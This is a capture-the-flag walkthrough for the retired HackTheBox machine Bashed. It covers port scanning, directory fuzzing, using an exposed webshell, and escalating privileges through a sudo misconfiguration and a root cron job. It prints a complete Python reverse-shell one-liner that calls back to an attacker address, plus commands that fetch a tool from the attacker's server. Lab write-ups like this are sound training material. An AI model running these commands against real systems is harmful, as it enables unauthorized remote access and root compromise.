Bashed is a retired linux box on HackTheBox. It is mentioned in the Tj_Null’s list of OSCP like boxes. Let us begin with scanning.
A quick nmap scan reveals port 80 is open.
Let us do a service scan for software version detection with -sV switch of nmap.
nmap -sV <IP>
It reveals port 80 has Apache httpd 2.4.18 running.
Since there is only one port (80) open, let us start with that.
If I hit the IP on the browser, the below image shows up :
It says there is a webshell (phpbash) installed somewhere on the server. Let us do some fuzzing now to see if we get the webshell directory.
wfuzz -c -u http://<IP>/FUZZ -w /usr/share/wordlist/dirb/big.txt — hc 400,403,404
-c : for colored output.
-u : for specifying IP.
-w : for specifying wordlist.
— hc : for hiding pages with response code follows.
The wfuzz scan reveals some directories. The dev directory looks interesting. Let us have a look at it.
The dev directory contains the webshell.
I tried to get reverse shell via bash, but for some reason (character filtering, i guess) it is not working. Nevertheless, it has python installed that may give us a reverse shell.
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<IP>”,<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’
Type the above on the webshell prompt, hit enter and set up a netcat listener on provided port.
nc -nlvp <port>
We have shell now. You can read the user flag.
PRIVILEGE ESCALATION TO SCRIPTMANAGER :
If I look at the sudo privileges www-data user has, it show it can run any command as scriptmanager without any password.
If that is the case, I can simply run bash with sudo as user scriptmanager.
sudo -u scriptmanager bash
We got shell as scriptmanager.
PRIVILEGE ESCALATION TO ROOT :
If I use the find command to look for files owned by the user scriptmanager, I got to know about a python file test.py .
find / -type f -user scriptmanager 2>/dev/null
If my instinct is right, there may be a cron job for root running the python script. To verify it, I am going to use pspy32 that is used to see commands run by other users, cron jobs, etc. as they execute. You can find the binary here.
Set up a local python server on the directory of local box where pspy32 is present.
python3 -m http.server 80
On the remote box, download it with wget.
wget http://<your IP>/pspy32
Hopefully pspy32 is now present on the remote box.
Let us run it now.
Seems I was right. The test.py is running as cronjob for root in every 1 minute interval.
We can use the same python reverse shell that we used for www-shell, but with a different port number. Save the reverse shell code to /scripts/test.py and set up another netcat listener on different tab.
We have the root shell now. You can read the root flag.
So that was the bashed box from HackTheBox. Hope you enjoyed it.
Thank You for reading this writeup. See you in the next one. Peace.